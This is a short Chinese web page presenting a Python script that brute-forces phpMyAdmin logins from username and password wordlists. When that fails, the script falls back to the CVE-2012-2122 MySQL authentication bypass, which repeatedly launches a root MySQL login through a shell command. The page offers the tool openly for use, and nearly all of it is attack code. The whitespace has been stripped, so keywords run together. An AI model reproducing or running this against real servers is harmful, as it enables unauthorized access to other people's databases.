Python写的PHPMyAdmin暴力破解工具代码
PHPMyAdmin暴力破解,加上CVE-2012-2122MySQLAuthenticationBypassVulnerability漏洞利用。
#!/usr/bin/envpython importurllib importurllib2 importcookielib importsys importsubprocess defCrack(url,username,password): opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) headers={'User-Agent':'Mozilla/5.0(WindowsNT6.1;WOW64)'} params=urllib.urlencode({'pma_username':username,'pma_password':password}) request=urllib2.Request(url+"/index.php",params,headers) response=opener.open(request) a=response.read() ifa.find('Databaseserver')!=-1anda.find('name="login_form"')==-1: returnusername,password return0 defMySQLAuthenticationBypassCheck(host,port): i=0 whilei<300: i=i+1 subprocess.Popen("mysql--host=%s-P%s-uroot-piswin"%(host,port),shell=True).wait() if__name__=='__main__': iflen(sys.argv)<4: print"#author:iswin\n#useagepythonpma.pyhttps://www.nhooo.com/phpmyadmin/username.txtpassword.txt" sys.exit() print"Bruting,Pleaswait..." fornameinopen(sys.argv[2],"r"): forpasswinopen(sys.argv[3],"r"): state=Crack(sys.argv[1],name,passw) ifstate!=0: print"\nBrutesuccessful" print"UserName:"+state[0]+"PassWord:"+state[1] sys.exit() print"Sorry,Brutefailed...,trytouseMySQLAuthenticationBypassCheck" choice=raw_input('Warning:Thisfunctionneedsmysqlenvironment.\nY:TrytoMySQLAuthenticationBypassCheck\nOthers:Exit\n') ifchoice=='Y'orchoice=='y': host=raw_input('Host:') port=raw_input('Port:') MySQLAuthenticationBypassCheck(host,port)